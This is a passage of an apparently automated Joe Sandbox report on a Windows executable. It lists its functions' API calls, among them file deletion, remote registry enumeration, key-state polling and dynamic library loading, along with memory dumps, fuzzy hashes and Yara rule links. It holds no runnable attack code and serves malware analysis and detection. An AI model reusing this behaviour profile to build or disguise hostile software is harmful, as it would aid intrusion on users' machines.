                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D535C4
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00D53646
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D5365C
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D5366D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D5367F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                  • Opcode ID: 03e2e6384e6b18497861a1a10ac52ccaf986dff6c365d2e7c358713f6254f20c
                                                                                                                                                                                                                                                                  • Instruction ID: e852382bb1d5a4137f48faec5ab1957a9662b6192241b26753a39bcc1ee6211d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03e2e6384e6b18497861a1a10ac52ccaf986dff6c365d2e7c358713f6254f20c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CB15E72D00219ABDF15DBA5CC85EDEBBBDEF49351F0040A6F909E6181EA319B488F71
                                                                                                                                                                                                                                                                  Function 00D6ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D6AE87
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D6AE95
                                                                                                                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D6AEC8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6B09D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                  • Opcode ID: c24a42f4b04173a5aef8c7cb3bf74c7a2ae1c6e75dd378662979e8afa01d77f8
                                                                                                                                                                                                                                                                  • Instruction ID: d49d50a93f06870d79eeca76ce4130f3d117d0894844af5b606486ac72ecce18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c24a42f4b04173a5aef8c7cb3bf74c7a2ae1c6e75dd378662979e8afa01d77f8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A1B071A04301AFE720DF24C886B2AB7E5AF44760F54881DF9A9DB392D771EC408B92
                                                                                                                                                                                                                                                                  Function 00D6C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C505
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C560
                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D6C5C3
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00D6C606
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C613
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 826366716-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7a1d9a2a3564240a5d3b26857c8c48dd1bd981242660d14fcad3c7079b5fed26
                                                                                                                                                                                                                                                                  • Instruction ID: b8f958b26e59aeb47c45c66cf2d83989181af2b736818fcd49f74926953437ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a1d9a2a3564240a5d3b26857c8c48dd1bd981242660d14fcad3c7079b5fed26
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE617F31218241AFD714DF54C890E3ABBE5FF84308F54955CF49A8B2A2DB31ED46CBA2
                                                                                                                                                                                                                                                                  Function 00D4ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D4D7CD,?), ref: 00D4E714
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D4D7CD,?), ref: 00D4E72D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00D4ED8A
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4EDC3
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4EF02
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4EF1A
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D4EF67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                  • Opcode ID: e394ccb9a6532feee6f5b06b4879fd6d90d2b814c4010087fbf4d71fe780f7e5
                                                                                                                                                                                                                                                                  • Instruction ID: 19b989d09ecd42b739d27e709689e9dcfa351ae37b29f32262ff814d75c7c209
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e394ccb9a6532feee6f5b06b4879fd6d90d2b814c4010087fbf4d71fe780f7e5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A15130B2408385ABC724EB54D891DDBB3ECEF94300F44092EF689D3191EF71A6888776
                                                                                                                                                                                                                                                                  Function 00D49517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D49534
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 00D495A5
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 00D49604
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D49677
                                                                                                                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D496A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                  • Opcode ID: 341eef563159f356bf2d441c549813a4fc24e3d309df2ca99ff413dde7da5ea0
                                                                                                                                                                                                                                                                  • Instruction ID: 448260971850b9374363883569b0d95b9f86263ae1afb405d3fc96145f4ef923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 341eef563159f356bf2d441c549813a4fc24e3d309df2ca99ff413dde7da5ea0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B45139B5A00619AFCB14CF59C894EAAB7F9FF89314B158559F909DB310E730E911CFA0
                                                                                                                                                                                                                                                                  Function 00D59540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D595F3
                                                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00D5961F
                                                                                                                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D59677
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D5969C
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D596A4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4347ce103e4c663658231e9b48e97bdef4fda2c6330dc68f0295cb1f1ef3e1ad
                                                                                                                                                                                                                                                                  • Instruction ID: 54b769e05f3afedf52406b973c2640e30d59e3a9c71c48fab5b271f0a9bd1137
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4347ce103e4c663658231e9b48e97bdef4fda2c6330dc68f0295cb1f1ef3e1ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55512D35A00255EFCF05DF55C891A6ABBF6FF48314F088058E849AB362DB35ED45DBA0
                                                                                                                                                                                                                                                                  Function 00D69941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00D6999D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00D69A2D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D69A49
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00D69A8F
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00D69AAF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00D51A02,?,7735E610), ref: 00CFF9F1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D40354,00000000,00000000,?,?,00D51A02,?,7735E610,?,00D40354), ref: 00CFFA18
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 666041331-0
                                                                                                                                                                                                                                                                  • Opcode ID: 09124562c77a8399cd52f2df4bb837669d585abb6a09a486dbb6aea6fe2fdce5
                                                                                                                                                                                                                                                                  • Instruction ID: 9666ab7f8eb77bd55a3f27bd39ad385431cf12ba4077288070e0c53515f5d03e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09124562c77a8399cd52f2df4bb837669d585abb6a09a486dbb6aea6fe2fdce5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA513835600245DFCB01DF68C4949A9FBF5FF09314B088099E84AAB362D731EE86CBA1
                                                                                                                                                                                                                                                                  Function 00D775AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00D7766B
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00D77682
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00D776AB
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00D5B5BE,00000000,00000000), ref: 00D776D0
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00D776FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8f2a7e01e86e2eba858d0cfd9a91d304aa19c2da15112e06423e5168a83ff4b7
                                                                                                                                                                                                                                                                  • Instruction ID: 735dd00644bc579fb5a8b3ee4209cf7b8c1e78e430708daf30a23378ff3637bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2a7e01e86e2eba858d0cfd9a91d304aa19c2da15112e06423e5168a83ff4b7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041E235A08604AFD7688F2CCC48FA97B65FB09350F198624F85DA73E4E270ED40DA70
                                                                                                                                                                                                                                                                  Function 00D123C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                                  • Opcode ID: b4aa054f7d91773fbb4eed52f7645209673ba9057dc0720ed363a8fe82ddd21e
                                                                                                                                                                                                                                                                  • Instruction ID: 10ef4c26285dfb0e1b03c48236adb699dfd7afafaca2dba4aac25fbfd0919e31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4aa054f7d91773fbb4eed52f7645209673ba9057dc0720ed363a8fe82ddd21e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441D372A00200AFCB20DF78D881AADB7E1EF89314F154568E515EB395DA32ED51CBA0
                                                                                                                                                                                                                                                                  Function 00CE19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                  • Opcode ID: 80b97454c2a43f01ecd93b27382cc7a799e30ddb4723ff2a0ab60398ac35766a
                                                                                                                                                                                                                                                                  • Instruction ID: 7abffb6875c7041b0d1af6c001c3d5d5b22b3b938220a7d5c19dcc8ecc05eea4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80b97454c2a43f01ecd93b27382cc7a799e30ddb4723ff2a0ab60398ac35766a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A41A171A0425AFFDF059F64D844BFEB771FF05324F248229E869A3290D7346AA0DB61
                                                                                                                                                                                                                                                                  Function 00D542B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 00D54310
                                                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00D54367
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00D54390
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D5439A
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D543AB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef4295d74ec374649d165dedd60c8bc29f1705fecef8640be30c7d46137ae98e
                                                                                                                                                                                                                                                                  • Instruction ID: 694da7cc6fade31970805145a19e2a24c934c272e6c50c8f60da165978386f7b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef4295d74ec374649d165dedd60c8bc29f1705fecef8640be30c7d46137ae98e
